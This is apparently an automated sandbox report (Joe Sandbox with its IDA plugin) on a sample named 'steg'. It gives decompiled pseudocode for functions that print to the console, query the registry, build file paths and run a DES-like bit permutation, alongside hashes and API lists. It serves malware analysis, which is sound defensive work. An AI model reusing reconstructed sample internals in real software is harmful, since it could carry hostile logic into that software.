                                                                                                                    0x00f8c872
                                                                                                                    0x00f8c878
                                                                                                                    0x00f8c87d
                                                                                                                    0x00f8c8b0
                                                                                                                    0x00f8c8c0
                                                                                                                    0x00f8c87f
                                                                                                                    0x00f8c87f
                                                                                                                    0x00f8c881
                                                                                                                    0x00000000
                                                                                                                    0x00f8c883
                                                                                                                    0x00f8c883
                                                                                                                    0x00f8c884
                                                                                                                    0x00f8c889
                                                                                                                    0x00f8c88e
                                                                                                                    0x00f8c894
                                                                                                                    0x00f8c899
                                                                                                                    0x00f8c89e
                                                                                                                    0x00f8c8a4
                                                                                                                    0x00f8c8a9
                                                                                                                    0x00f8c8ff
                                                                                                                    0x00f8c902
                                                                                                                    0x00f8c907
                                                                                                                    0x00f8c909
                                                                                                                    0x00f8c943
                                                                                                                    0x00f8c94c
                                                                                                                    0x00f8c952
                                                                                                                    0x00f8c957
                                                                                                                    0x00f8c966
                                                                                                                    0x00f8c90b
                                                                                                                    0x00f8c90b
                                                                                                                    0x00f8c910
                                                                                                                    0x00f8c916
                                                                                                                    0x00f8c91b
                                                                                                                    0x00f8c920
                                                                                                                    0x00f8c925
                                                                                                                    0x00f8c92b
                                                                                                                    0x00f8c930
                                                                                                                    0x00f8c940
                                                                                                                    0x00f8c940
                                                                                                                    0x00f8c909
                                                                                                                    0x00f8c881
                                                                                                                    0x00f8c87d

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 00F8C86D
                                                                                                                    • _wprintf.LIBCMT ref: 00F8C8F0
                                                                                                                    • _wprintf.LIBCMT ref: 00F8C8FA
                                                                                                                    • _fprintf.LIBCMT ref: 00F8C916
                                                                                                                    • _fprintf.LIBCMT ref: 00F8C92B
                                                                                                                    • _wprintf.LIBCMT ref: 00F8C95C
                                                                                                                      • Part of subcall function 00FE93FA: _strlen.LIBCMT ref: 00FE94A0
                                                                                                                      • Part of subcall function 00FE93FA: __lock_file.LIBCMT ref: 00FE94AB
                                                                                                                      • Part of subcall function 00FE93FA: __stbuf.LIBCMT ref: 00FE94B7
                                                                                                                      • Part of subcall function 00FE93FA: __ftbuf.LIBCMT ref: 00FE94CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf$_fprintf$__ftbuf__lock_file__stbuf__wfopen_s_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 718506414-0
                                                                                                                    • Opcode ID: ea00f4a27cb9882ad5ad3b50a20ff5e45250023bd1f1246198e9f6858b94b012
                                                                                                                    • Instruction ID: 007b8ae22b8c04f9ed70dec66446b25e69fbbd3e4e9702e7a75bfcacde1b9888
                                                                                                                    • Opcode Fuzzy Hash: ea00f4a27cb9882ad5ad3b50a20ff5e45250023bd1f1246198e9f6858b94b012
                                                                                                                    • Instruction Fuzzy Hash: AC11A572A87755FFCA1037E5BC03FDD36089B11F22B248526BD0DA00929AED555063BE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FA4A67 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 207COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 17%
                                                                                                                    			E00FA4A67(char _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _t61;
				void* _t62;
				char* _t69;
				signed int _t82;
				signed int _t87;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				char* _t101;
				intOrPtr _t103;
				void* _t105;
				intOrPtr _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				signed int _t110;
				signed int _t111;
				void* _t112;
				signed int _t114;
				intOrPtr* _t115;
				intOrPtr _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t128;
				void* _t129;

				_t61 = _a8;
				_t115 =  *((intOrPtr*)(_t61 + 0x10));
				_t110 =  *(_t61 + 0xc);
				_t100 = 0;
				_v32 = _t110;
				if(_t110 > 0) {
					do {
						_t109 =  *_t115;
						_t99 = 0;
						_t107 =  *_t109;
						while(_t107 != 0) {
							if(_t107 == 0x22) {
								_t99 = _t99 + 1;
							}
							_t107 =  *((intOrPtr*)(_t109 + 1));
							_t109 = _t109 + 1;
							_t99 = _t99 + 1;
						}
						_t100 = _t100 + 7 + _t99;
						_t115 = _t115 + 0x18;
						_t110 = _t110 - 1;
					} while (_t110 != 0);
					_t110 = _v32;
					_t61 = _a8;
				}
				_t108 =  *((intOrPtr*)(_t61 + 4));
				_t62 = 0;
				_t103 =  *_t108;
				while(_t103 != 0) {
					if(_t103 == 0x22) {
						_t62 = _t62 + 1;
					}
					_t103 =  *((intOrPtr*)(_t108 + 1));
					_t108 = _t108 + 1;
					_t62 = _t62 + 1;
				}
				_t10 = _t62 + 2; // 0x3
				_t105 = _t10 + _t100;
				if(_t105 >= 0x32) {
					_v12 = 0x477560;
					_v20 = 0x477564;
					_v32 = 0x47756c;
				} else {
					_v12 = 0x470859;
					_v20 = 0x477558;
					_v32 = 0x47755c;
				}
				_t117 = 0x23 + (_t110 + _t110 * 2) * 2 + _t105;
				_v28 = _t117;
				if(_t117 - 1 > 0x7ffffefe) {
					L42:
					_t59 =  &_a4; // 0x477560
					 *((char*)( *_t59 + 0x1e)) = 1;
					return 0;
				} else {
					if( *0x481808 == 0) {
						_t101 =  *0x481820(_t117);
						goto L25;
					} else {
						_t93 =  *0x481910;
						if(_t93 != 0) {
							 *0x481850(_t93);
							_t123 = _t123 + 4;
						}
						E00FAB537(_t108, _t117,  &_v16);
						_t96 =  *0x481910;
						_t124 = _t123 + 8;
						if(_t96 == 0) {
							_t101 = _v16;
						} else {
							 *0x481858(_t96);
							_t101 = _v16;
							L25:
							_t124 = _t123 + 4;
						}
					}
					if(_t101 == 0) {
						goto L42;
					} else {
						_push(0x477570);
						_push(_t101);
						_push(_t117);
						E00F971A7();
						_t125 = _t124 + 0xc;
						_t69 = _t101;
						if( *_t101 != 0) {
							do {
								_t69 = _t69 + 1;
							} while ( *_t69 != 0);
						}
						_v8 = _t69 - _t101 & 0x3fffffff;
						E00FA99A7(_t105, _t101,  &_v8,  *((intOrPtr*)(_a8 + 4)));
						_t111 = _v8;
						_t106 = _a8;
						 *((char*)(_t101 + _t111)) = 0x28;
						_t126 = _t125 + 0xc;
						_t112 = _t111 + 1;
						_v16 =  *((intOrPtr*)(_t106 + 0x10));
						_v24 = 0;
						if( *((intOrPtr*)(_t106 + 0xc)) > 0) {
							do {
								_t37 =  &_v12; // 0x477560
								_push( *_t37);
								_t119 = _t101 + _t112;
								_push(_t119);
								_push(_v28 - _t112);
								E00F971A7();
								_t128 = _t126 + 0xc;
								_t82 = _t119;
								if(_t119 != 0) {
									if( *_t119 != 0) {
										do {
											_t82 = _t82 + 1;
										} while ( *_t82 != 0);
									}
									_t82 = _t82 - _t119 & 0x3fffffff;
								}
								_t120 = _v16;
								_v12 = _v20;
								_v8 = _t112 + _t82;
								E00FA99A7(_t106, _t101,  &_v8,  *_t120);
								_t129 = _t128 + 0xc;
								_t87 =  *(0x475038 +  *(_t120 + 0x16) * 4);
								_t121 = _t87;
								if(_t87 != 0) {
									if( *_t87 != 0) {
										do {
											_t121 = _t121 + 1;
										} while ( *_t121 != 0);
									}
									_t121 = _t121 - _t87 & 0x3fffffff;
								}
								_t114 = _v8;
								E00FE7337(_t101 + _t114, _t87, _t121);
								_t106 = _a8;
								_v16 = _v16 + 0x18;
								_t91 = _v24 + 1;
								_t126 = _t129 + 0xc;
								_t112 = _t114 + _t121;
								_v24 = _t91;
							} while (_t91 <  *((intOrPtr*)(_a8 + 0xc)));
							_t117 = _v28;
						}
						_t57 =  &_v32; // 0x47756c
						E00F971A7(_t117 - _t112, _t101 + _t112, 0x470310,  *_t57);
						return _t101;
					}
				}
			}









































                                                                                                                    0x00fa4a6d
                                                                                                                    0x00fa4a72
                                                                                                                    0x00fa4a76
                                                                                                                    0x00fa4a79
                                                                                                                    0x00fa4a7b
                                                                                                                    0x00fa4a80
                                                                                                                    0x00fa4a87
                                                                                                                    0x00fa4a87
                                                                                                                    0x00fa4a89
                                                                                                                    0x00fa4a8b
                                                                                                                    0x00fa4a8f
                                                                                                                    0x00fa4a9a
                                                                                                                    0x00fa4a9c
                                                                                                                    0x00fa4a9c
                                                                                                                    0x00fa4a9d
                                                                                                                    0x00fa4aa0
                                                                                                                    0x00fa4aa1
                                                                                                                    0x00fa4aa2
                                                                                                                    0x00fa4aa9
                                                                                                                    0x00fa4aab
                                                                                                                    0x00fa4aae
                                                                                                                    0x00fa4aae
                                                                                                                    0x00fa4ab1
                                                                                                                    0x00fa4ab4
                                                                                                                    0x00fa4ab4
                                                                                                                    0x00fa4ab7
                                                                                                                    0x00fa4aba
                                                                                                                    0x00fa4abc
                                                                                                                    0x00fa4ac0
                                                                                                                    0x00fa4aca
                                                                                                                    0x00fa4acc
                                                                                                                    0x00fa4acc
                                                                                                                    0x00fa4acd
                                                                                                                    0x00fa4ad0
                                                                                                                    0x00fa4ad1
                                                                                                                    0x00fa4ad2
                                                                                                                    0x00fa4ad6
                                                                                                                    0x00fa4ad9
                                                                                                                    0x00fa4ade
                                                                                                                    0x00fa4af7
                                                                                                                    0x00fa4afe
                                                                                                                    0x00fa4b05
                                                                                                                    0x00fa4ae0
                                                                                                                    0x00fa4ae0
                                                                                                                    0x00fa4ae7
                                                                                                                    0x00fa4aee
                                                                                                                    0x00fa4aee
                                                                                                                    0x00fa4b16
                                                                                                                    0x00fa4b18
                                                                                                                    0x00fa4b23
                                                                                                                    0x00fa4c97
                                                                                                                    0x00fa4c97
                                                                                                                    0x00fa4c9c
                                                                                                                    0x00fa4ca6
                                                                                                                    0x00fa4b29
                                                                                                                    0x00fa4b30
                                                                                                                    0x00fa4b73
                                                                                                                    0x00000000
                                                                                                                    0x00fa4b32
                                                                                                                    0x00fa4b32
                                                                                                                    0x00fa4b39
                                                                                                                    0x00fa4b3c
                                                                                                                    0x00fa4b42
                                                                                                                    0x00fa4b42
                                                                                                                    0x00fa4b4a
                                                                                                                    0x00fa4b4f
                                                                                                                    0x00fa4b54
                                                                                                                    0x00fa4b59
                                                                                                                    0x00fa4b67
                                                                                                                    0x00fa4b5b
                                                                                                                    0x00fa4b5c
                                                                                                                    0x00fa4b62
                                                                                                                    0x00fa4b75
                                                                                                                    0x00fa4b75
                                                                                                                    0x00fa4b75
                                                                                                                    0x00fa4b59
                                                                                                                    0x00fa4b7a
                                                                                                                    0x00000000
                                                                                                                    0x00fa4b80
                                                                                                                    0x00fa4b80
                                                                                                                    0x00fa4b85
                                                                                                                    0x00fa4b86
                                                                                                                    0x00fa4b87
                                                                                                                    0x00fa4b8c
                                                                                                                    0x00fa4b92
                                                                                                                    0x00fa4b94
                                                                                                                    0x00fa4b97
                                                                                                                    0x00fa4b97
                                                                                                                    0x00fa4b98
                                                                                                                    0x00fa4b97
                                                                                                                    0x00fa4ba4
                                                                                                                    0x00fa4bb2
                                                                                                                    0x00fa4bb7
                                                                                                                    0x00fa4bba
                                                                                                                    0x00fa4bbd
                                                                                                                    0x00fa4bc4
                                                                                                                    0x00fa4bc7
                                                                                                                    0x00fa4bcc
                                                                                                                    0x00fa4bcf
                                                                                                                    0x00fa4bd6
                                                                                                                    0x00fa4bdc
                                                                                                                    0x00fa4bdc
                                                                                                                    0x00fa4bdc
                                                                                                                    0x00fa4be2
                                                                                                                    0x00fa4be7
                                                                                                                    0x00fa4be8
                                                                                                                    0x00fa4be9
                                                                                                                    0x00fa4bee
                                                                                                                    0x00fa4bf1
                                                                                                                    0x00fa4bf5
                                                                                                                    0x00fa4bfa
                                                                                                                    0x00fa4bfc
                                                                                                                    0x00fa4bfc
                                                                                                                    0x00fa4bfd
                                                                                                                    0x00fa4bfc
                                                                                                                    0x00fa4c04
                                                                                                                    0x00fa4c04
                                                                                                                    0x00fa4c09
                                                                                                                    0x00fa4c13
                                                                                                                    0x00fa4c1b
                                                                                                                    0x00fa4c1e
                                                                                                                    0x00fa4c27
                                                                                                                    0x00fa4c2a
                                                                                                                    0x00fa4c31
                                                                                                                    0x00fa4c35
                                                                                                                    0x00fa4c3a
                                                                                                                    0x00fa4c3c
                                                                                                                    0x00fa4c3c
                                                                                                                    0x00fa4c3d
                                                                                                                    0x00fa4c3c
                                                                                                                    0x00fa4c44
                                                                                                                    0x00fa4c44
                                                                                                                    0x00fa4c4a
                                                                                                                    0x00fa4c53
                                                                                                                    0x00fa4c5b
                                                                                                                    0x00fa4c5e
                                                                                                                    0x00fa4c62
                                                                                                                    0x00fa4c63
                                                                                                                    0x00fa4c66
                                                                                                                    0x00fa4c68
                                                                                                                    0x00fa4c6b
                                                                                                                    0x00fa4c74
                                                                                                                    0x00fa4c74
                                                                                                                    0x00fa4c77
                                                                                                                    0x00fa4c86
                                                                                                                    0x00fa4c96
                                                                                                                    0x00fa4c96
                                                                                                                    0x00fa4b7a

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `uG$`uG$duG$luG
                                                                                                                    • API String ID: 0-3174765998
                                                                                                                    • Opcode ID: 36d05cb38f7993d812db7c8f678d5037fa29f5533ecc268c2669a41c54769fe8
                                                                                                                    • Instruction ID: 3206a9f6d618b51eb57568c5ef1e7cf359c82238eb916ce30f6881e8e6732c57
                                                                                                                    • Opcode Fuzzy Hash: 36d05cb38f7993d812db7c8f678d5037fa29f5533ecc268c2669a41c54769fe8
                                                                                                                    • Instruction Fuzzy Hash: 6A71ECB1D002499FDB10CF98CC44BAEBBF4EF86324F244165D858D7241D3B9EA46DB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8F387 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 26%
                                                                                                                    			E00F8F387(void* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v136;
				char _v271;
				void _v272;
				char _v276;
				char _v532;
				char _v784;
				char _v788;
				char _v792;
				char _v796;
				char _v1052;
				char _v1136;
				signed short _v1152;
				char _v1160;
				intOrPtr _v1196;
				signed int _v1208;
				char _v1467;
				char _v1468;
				char _v1980;
				intOrPtr _v1988;
				intOrPtr _v2044;
				signed int _v2056;
				char _v2076;
				signed int _v2080;
				char _v2315;
				char _v2316;
				char _v2572;
				intOrPtr _v4132;
				intOrPtr _v4136;
				intOrPtr _v4140;
				signed int* _v4144;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t100;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				char* _t112;
				void* _t122;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				void* _t128;
				char* _t138;
				signed int _t141;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t166;
				signed int _t168;
				char _t169;
				signed int _t174;
				signed int _t179;
				signed int _t184;
				signed int _t189;
				signed int _t201;
				signed int _t206;
				signed int _t211;
				signed int _t216;
				signed int _t219;
				intOrPtr* _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t227;
				signed int _t237;
				signed int _t241;
				intOrPtr _t243;
				signed int _t245;
				void* _t247;
				signed int _t253;
				void* _t261;
				void* _t266;
				void* _t269;
				void* _t272;
				void* _t273;
				void* _t276;
				intOrPtr* _t282;
				intOrPtr* _t283;
				void* _t284;
				intOrPtr* _t288;
				intOrPtr* _t290;
				intOrPtr* _t298;
				void* _t300;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				intOrPtr* _t311;
				signed int _t312;
				intOrPtr* _t315;
				int _t317;
				intOrPtr* _t321;
				void* _t323;
				signed int _t324;
				void* _t325;
				void* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				void* _t337;
				intOrPtr* _t338;
				void* _t339;
				void* _t340;
				intOrPtr* _t341;
				void* _t343;
				void* _t345;
				void* _t346;
				signed int* _t347;
				void* _t349;
				void* _t350;
				void* _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				void* _t358;
				void* _t360;
				void* _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				void* _t373;
				intOrPtr* _t374;
				void* _t376;
				void* _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				void* _t385;
				signed int _t386;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_v8 =  *0x481f80 ^ _t379;
				_t282 = _a8;
				_t341 =  *0x470104;
				_t100 =  *_t341(0xfffffff5, _t340, _t354, __ebx);
				_t101 =  *0x47004c(_t100,  &_v1160);
				_t355 = _v1152 & 0x0000ffff;
				if(_t101 == 0) {
					_t355 = 0xf;
				}
				E00F8B947();
				_t103 = _a4;
				_t407 = _t103 - 1;
				if(_t103 != 1) {
					__eflags = _t103 - 2;
					if(_t103 == 2) {
						goto L18;
					} else {
						__eflags = _t103 - 3;
						if(_t103 == 3) {
							_t245 = E00FE80AD( *((intOrPtr*)(_t282 + 4)), 0x470f2c);
							__eflags = _t245;
							if(_t245 != 0) {
								E00F8F0B7();
							} else {
								E00FE7AF9( &_v1136, 0x3e8,  *((intOrPtr*)(_t282 + 8)));
								_t321 =  &_v1136;
								_t323 = _t321 + 1;
								do {
									_t253 =  *_t321;
									_t321 = _t321 + 1;
									__eflags = _t253;
								} while (_t253 != 0);
								__eflags = _t321 - _t323 - 1;
								if(_t321 - _t323 >= 1) {
									E00F8C857( &_v1136);
								} else {
									E00F8F0B7();
									_push(0x470f30);
									E00F8EE77();
								}
							}
							_t247 =  *_t341();
							 *0x470050(_t355 | 0x00000008);
							_t353 = _t247;
							_pop(_t378);
							__eflags = 0;
							_t284 = 0xfffffff5;
							return E00FE72F2(0, _t284, _v8 ^ _t379, _t323, _t353, _t378);
						} else {
							E00F8F0B7();
							_push(0x470f00);
							E00F8EE77();
							_t383 = _t383 + 4;
							goto L19;
						}
					}
				} else {
					E00F8F2D7();
					_t261 =  *_t341(0xfffffff5);
					_t282 =  *0x470050;
					 *_t282(_t261, 0xa);
					E00FE9C53(_t282, _t341, _t355, _t407);
					E00FE9C53(_t282, _t341, _t355, _t407);
					E00F8EAC7();
					_t266 =  *_t341(0xfffffff5, 0x470d68, 0x470d48, 0x470d40, 0x470d34, 0x470d28, 0x470d1c);
					 *_t282(_t266, 0xf);
					E00FE9C53(_t282, _t341, _t355, _t407);
					_t383 = _t383 + 0x20;
					_t269 =  *_t341(0xfffffff5, 0x470e64, 0x4703dc);
					 *_t282(_t269, 0xf);
					_t272 =  *0x4700ec(0x470e90,  &_v136, 0x80);
					_t408 = _t272;
					if(_t272 == 0) {
						_t276 =  *_t341(0xfffffff5);
						 *_t282(_t276, 0xc);
						_push(0x470e98);
						E00FE9C53(_t282, _t341, _t355, _t408);
						_push(0x470ee0);
						E00FE9C53(_t282, _t341, _t355, _t408);
						_t383 = _t383 + 8;
						E00FE9F16(_t282, _t355, _t408);
					}
					_t273 =  *_t341(0xfffffff5);
					_t355 = _t355 | 0x00000008;
					 *_t282(_t273, _t355);
					E00FE8F58(0);
					L18:
					E00F8F0B7();
					L19:
					_t105 =  *_t341(0xfffffff5);
					_t356 = _t355 | 0x00000008;
					 *0x470050(_t105, _t356);
					E00FE8F58(0);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t379);
					_t380 = _t383;
					_v1208 =  *0x481f80 ^ _t380;
					_v1468 = 0;
					E00FE7C87( &_v1467, 0, 0x103);
					_t385 = _t383 - 0x314 + 0xc;
					_v1988 = 0x104;
					_t112 =  &_v1980;
					if(_v1196 != 0xf) {
						_push(0x470fa8);
					} else {
						_push(0x470f60);
					}
					_push(0x200);
					_push(_t112);
					E00FE7AF9();
					_t386 = _t385 + 0xc;
					_push( &_v788);
					_push(0x20019);
					_push(0);
					_push( &_v784);
					_push(0x80000002);
					if( *0x470028() != 0) {
						L45:
						__eflags = 0;
						return E00FE72F2(0, _t282, _v12 ^ _t380, _t323, _t341, _t356);
					} else {
						_t122 =  *0x470024(_v788, 0, 0,  &_v796,  &_v272,  &_v792);
						if(_t122 != 0 || _v792 <= _t122 || _v272 == _t122) {
							 *0x47002c(_v788);
							goto L45;
						} else {
							 *0x47002c(_v788, _t341, _t356);
							if(_v272 == 0x22) {
								_t315 =  &_v272;
								_t31 = _t315 + 1; // 0x23
								_t339 = _t31;
								do {
									_t243 =  *_t315;
									_t315 = _t315 + 1;
								} while (_t243 != 0);
								_t317 = _t315 - _t339 - 1;
								if(_t317 > 0) {
									_t356 =  &_v271;
									memcpy( &_v272, _t356, _t317);
									_t386 = _t386 + 0xc;
									_t341 = _t356 + _t317 + _t317;
								}
							}
							_t288 =  &_v272;
							_t35 = _t288 + 1; // 0x23
							_t324 = _t35;
							do {
								_t125 =  *_t288;
								_t288 = _t288 + 1;
							} while (_t125 != 0);
							_t36 = _t288 - _t324 - 1; // 0x22
							_t126 = _t36;
							if(_t126 <= 0) {
								L37:
								_t290 =  &_v272;
								_t40 = _t290 + 1; // 0x1
								_t325 = _t40;
								do {
									_t127 =  *_t290;
									_t290 = _t290 + 1;
								} while (_t127 != 0);
								_t41 = _t290 - _t325 + 1; // 0x2
								_t342 = _t41;
								_t128 = E00FE7BCE(_t282, _t41, _t41);
								_t357 = _t128;
								if(_t128 != 0) {
									E00FE7AF9(_t357, _t342,  &_v272);
								}
								_pop(_t343);
								_pop(_t358);
								return E00FE72F2(_t357, _t282, _v12 ^ _t380, _t325, _t343, _t358);
							} else {
								while( *((char*)(_t380 + _t126 - 0x108)) != 0x5c) {
									_t126 = _t126 - 1;
									if(_t126 > 0) {
										continue;
									} else {
										goto L37;
									}
									goto L80;
								}
								__eflags = _t126 - 0x104;
								if(_t126 >= 0x104) {
									E00FE7EEC();
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t380);
									_t381 = _t386;
									_v2056 =  *0x481f80 ^ _t381;
									_push(_t356);
									_push(_t341);
									_v2316 = 0;
									E00FE7C87( &_v2315, 0, 0x103);
									_t390 = _t386 - 0x814 + 0xc;
									_t344 = 0;
									_t359 = 0;
									__eflags = _v2044 - 0xf;
									_t138 =  &_v2572;
									if(_v2044 != 0xf) {
										_push(0x471000);
									} else {
										_push(0x470fec);
									}
									E00FE7AF9();
									_t391 = _t390 + 0xc;
									_t141 =  *0x470200(0, 0x1a, 0, 0,  &_v276, _t138, 0x100);
									__eflags = _t141;
									if(_t141 == 0) {
										E00FE7AF9( &_v1052, 0x208,  &_v276);
										E00FE7B4E( &_v1052, 0x208, 0x470790);
										E00FE7B4E( &_v1052, 0x208,  &_v532);
										E00FE7B4E( &_v1052, 0x208, 0x471010);
										_v2080 = _t359;
										_t154 = E00FE928A( &_v2080,  &_v1052, 0x470890);
										_t392 = _t391 + 0x3c;
										__eflags = _t154;
										if(_t154 != 0) {
											goto L52;
										} else {
											_t157 = _v2080;
											__eflags = _t157;
											if(__eflags == 0) {
												goto L52;
											} else {
												_push(_t157);
												_push(0x400);
												_push( &_v2076);
												_t159 = E00FE9087(_t282, _t344, _t359, __eflags);
												_t393 = _t392 + 0xc;
												__eflags = _t159;
												if(__eflags == 0) {
													L77:
													_push(_v2080);
													E00FE9010(_t282, _t344, _t359, __eflags);
													_pop(_t346);
													__eflags = _v16 ^ _t381;
													_pop(_t361);
													return E00FE72F2(_t344, _t282, _v16 ^ _t381, _t324, _t346, _t361);
												} else {
													do {
														E00FE8317( &_v2076, 0x400);
														_t395 = _t393 + 8;
														__eflags = _t359;
														if(_t359 != 0) {
															_t166 = E00FE8487( &_v2076, 0x471030);
															_t396 = _t395 + 8;
															__eflags = _t166;
															if(__eflags != 0) {
																_t168 = E00FE8487( &_v2076, 0x471038);
																_t397 = _t396 + 8;
																__eflags = _t168;
																if(_t168 != 0) {
																	 *_t168 = 0x5c;
																}
																_t298 =  &_v2076;
																_t326 = _t298 + 1;
																do {
																	_t169 =  *_t298;
																	_t298 = _t298 + 1;
																	__eflags = _t169;
																} while (_t169 != 0);
																_t300 = _t298 - _t326 - 1;
																__eflags = _t300 - 0x400;
																if(_t300 >= 0x400) {
																	E00FE7EEC();
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t381);
																	_push(_t359);
																	_push(_t344);
																	_t347 = _v4144;
																	_t362 = _t347[1];
																	_t327 =  *_t347;
																	_t174 = (_t362 >> 0x00000004 ^ _t327) & 0x0f0f0f0f;
																	_t328 = _t327 ^ _t174;
																	_t363 = _t362 ^ _t174 << 0x00000004;
																	_t179 = (_t328 >> 0x00000010 ^ _t363) & 0x0000ffff;
																	_t364 = _t363 ^ _t179;
																	_t329 = _t328 ^ _t179 << 0x00000010;
																	_t184 = (_t364 >> 0x00000002 ^ _t329) & 0x33333333;
																	_t330 = _t329 ^ _t184;
																	_t365 = _t364 ^ _t184 << 0x00000002;
																	_t189 = (_t330 >> 0x00000008 ^ _t365) & 0x00ff00ff;
																	_t366 = _t365 ^ _t189;
																	_t331 = _t330 ^ _t189 << 0x00000008;
																	_t304 = (_t366 >> 0x00000001 ^ _t331) & 0x55555555;
																	 *_t347 = _t304 ^ _t331;
																	_t347[1] = _t304 + _t304 ^ _t366;
																	E00F8FFF7(_t347, _v4132, 0);
																	E00F8FFF7(_t347, _v4136, 1);
																	E00F8FFF7(_t347, _v4140, 0);
																	_t367 = _t347[1];
																	_t332 =  *_t347;
																	_t201 = (_t367 >> 0x00000001 ^ _t332) & 0x55555555;
																	_t333 = _t332 ^ _t201;
																	_t368 = _t367 ^ _t201 + _t201;
																	_t206 = (_t333 >> 0x00000008 ^ _t368) & 0x00ff00ff;
																	_t369 = _t368 ^ _t206;
																	_t334 = _t333 ^ _t206 << 0x00000008;
																	_t211 = (_t369 >> 0x00000002 ^ _t334) & 0x33333333;
																	_t335 = _t334 ^ _t211;
																	_t370 = _t369 ^ _t211 << 0x00000002;
																	_t216 = (_t335 >> 0x00000010 ^ _t370) & 0x0000ffff;
																	_t371 = _t370 ^ _t216;
																	_t336 = _t335 ^ _t216 << 0x00000010;
																	_t308 = (_t371 >> 0x00000004 ^ _t336) & 0x0f0f0f0f;
																	_t219 = _t308 ^ _t336;
																	_t310 = _t308 << 0x00000004 ^ _t371;
																	__eflags = _t310;
																	 *_t347 = _t219;
																	_t347[1] = _t310;
																	return _t219;
																} else {
																	_push(_t282);
																	 *((char*)(_t381 + _t300 - 0x810)) = _t169;
																	_t221 = E00FE8487( &_v2076, 0x47103c);
																	_t311 =  &_v276;
																	_t399 = _t397 + 8;
																	_t283 = _t221;
																	_t79 = _t311 + 1; // 0x1
																	_t337 = _t79;
																	do {
																		_t222 =  *_t311;
																		_t311 = _t311 + 1;
																		__eflags = _t222;
																	} while (_t222 != 0);
																	_t312 = _t311 - _t337;
																	__eflags = _t312;
																	_t338 =  &_v532;
																	_t373 = _t338 + 1;
																	do {
																		_t223 =  *_t338;
																		_t338 = _t338 + 1;
																		__eflags = _t223;
																	} while (_t223 != 0);
																	_t324 = _t338 - _t373;
																	__eflags = _t324;
																	_t374 = _t283;
																	_t82 = _t374 + 1; // 0x1
																	_t349 = _t82;
																	do {
																		_t224 =  *_t374;
																		_t374 = _t374 + 1;
																		__eflags = _t224;
																	} while (_t224 != 0);
																	_t83 = _t312 + 3; // 0x4
																	_t359 = _t374 - _t349 + _t83 + _t324;
																	_t227 = E00FE7BCE(_t283, _t349, _t374 - _t349 + _t83 + _t324);
																	_t344 = _t227;
																	_t393 = _t399 + 4;
																	__eflags = _t227;
																	if(__eflags != 0) {
																		E00FE7AF9(_t344, _t359,  &_v276);
																		E00FE7B4E(_t344, _t359, 0x470790);
																		E00FE7B4E(_t344, _t359,  &_v532);
																		E00FE7B4E(_t344, _t359, 0x470790);
																		_t86 = _t283 + 1; // 0x1
																		E00FE7B4E(_t344, _t359, _t86);
																		_t393 = _t393 + 0x3c;
																	}
																	_pop(_t282);
																	goto L77;
																}
															} else {
																goto L61;
															}
														} else {
